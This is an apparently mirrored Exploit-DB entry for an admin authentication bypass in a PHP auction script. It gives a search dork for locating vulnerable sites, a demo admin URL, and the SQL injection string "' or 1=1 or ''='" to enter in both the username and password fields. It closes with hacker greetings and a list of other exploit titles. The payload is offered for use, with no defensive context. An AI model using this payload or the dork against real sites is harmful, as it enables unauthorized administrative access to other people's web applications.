Auction_Software Script – Admin Authentication Bypass

Exploit Database
7 阅读

作者： ALTBTA

日期： 2010-07-06
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/14247/

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Name :Auction_Software Script Admin Login Bypass vulnerability
vendor URL :http://www.brotherscripts.com/
Price:$24.95
Author : altbta <l_9[at]hotmail.com>
dork : "PHPAuction GPL Enhanced V2.51 by AuctionCode.com"

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Xploit : Auth Bypass
Demo :
http://www.site.com/demos/Auction_Software/admin/

UserName: ' or 1=1 or ''='

Password: ' or 1=1 or ''='


1-=-=-=-=-=-=-=-=-=-=-=-=-=-= (altbta) =-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
greetz to : RoMaNcYxHaCkEr & sad hacker & ab0-3th4b & Mr.SaFa7 & Mn7oS & V !
V 3
Evil-Cod3r & asL-Sabia & ! Dr.www ! & MaKKaWi & ZaIdOoHxHaCkEr & al.bito
SnIpEr.SiTeS & R3d-D3v!L & MN9

xp10.me/xp10 & v4-team.com/cc

last Exploits
Auction_Software Script – Admin Authentication Bypass的更多信息

SMF 2.0.1 – SQL Injection / Privilege Escalation：
phpMySite – Cross-Site Scripting / SQL Injection：
Digirez 3.4 – Cross-Site Request Forgery (Update Admin)：
WordPress Plugin 1 Flash Gallery 0.2.5 – Cross-Site Scripting / SQL Injection：
Bootstrapy CMS – Multiple SQL Injection：
WordPress Theme Colormix – Multiple Vulnerabilities：
Seq 4.2.476 – Authentication Bypass：
WP Server Log Viewer 1.0 – ‘logfile’ Persistent Cross-Site Scripting：